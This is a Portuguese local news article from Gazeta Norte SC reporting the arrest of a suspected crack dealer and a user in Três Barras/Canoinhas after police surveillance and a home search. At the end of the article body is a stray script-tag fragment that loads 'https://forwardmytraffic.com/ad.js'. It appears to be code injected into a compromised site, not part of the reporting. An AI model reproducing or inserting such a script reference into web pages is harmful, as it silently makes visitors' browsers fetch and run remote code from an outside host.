InícioDestaqueTraficante é Preso em Três Barras

Traficante é Preso em Três Barras

Últimas notícias

Confira regras do IRPF 2025; prazo para declaração começa na segunda

Uma das principais ferramentas que agiliza a entrega da...

Mega-Sena não tem ganhadores e prêmio vai para R$ 21 milhões

Nenhum apostador acertou as seis dezenas do concurso 2.839...

Homem com Mandado de Prisão em Aberto por Furto é Capturado em Três Barras

Nessa quarta-feira (14), um homem com mandado de prisão...

Após denúncias de tráfico de drogas no local conhecido como “Rua velha” na Rua Etelvina de Almeida Pires, bairro São Cristóvão, equipes da PM flagraram uma movimentação, suspeita de tráfico de drogas. No local por várias vezes chegam possíveis usuários, conversavam com um masculino, pegavam algo, e deslocavam para baixo da ponte sobre o rio Canoinhas.

Em dado momento um masculino chegou no local de bicicleta e logo após deslocou sentido centro da cidade de Canoinhas, onde foi abordado pela GUPM ROCAM.

 

Foi realizado abordagem e identificado, que ao visualizar a GU PM Rocam jogou algo no chão. Após averiguação foi constatado que se tratava de uma pedra de Crack – 01 Unidade(s).

 

De Posse do presente crime consumado de tráfico de drogas a GU PM Rocam deslocou e abordou em frente a residência um jovem.

 

Diante da autorização verbal concedida pelo jovem e do crime em andamento a GUPM ROCAM realizou buscas na residência, sendo localizado em uma prateleira do quarto Crack – 2 Unidade(s) e Cinquenta Reais em dinheiro.

 

Diante da situação supranarrada foi dado voz de prisão ao jovem e conduzido o outro abordado, por posse de drogas, ambos conduzidos até a Delegacia de Polícia Civil…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.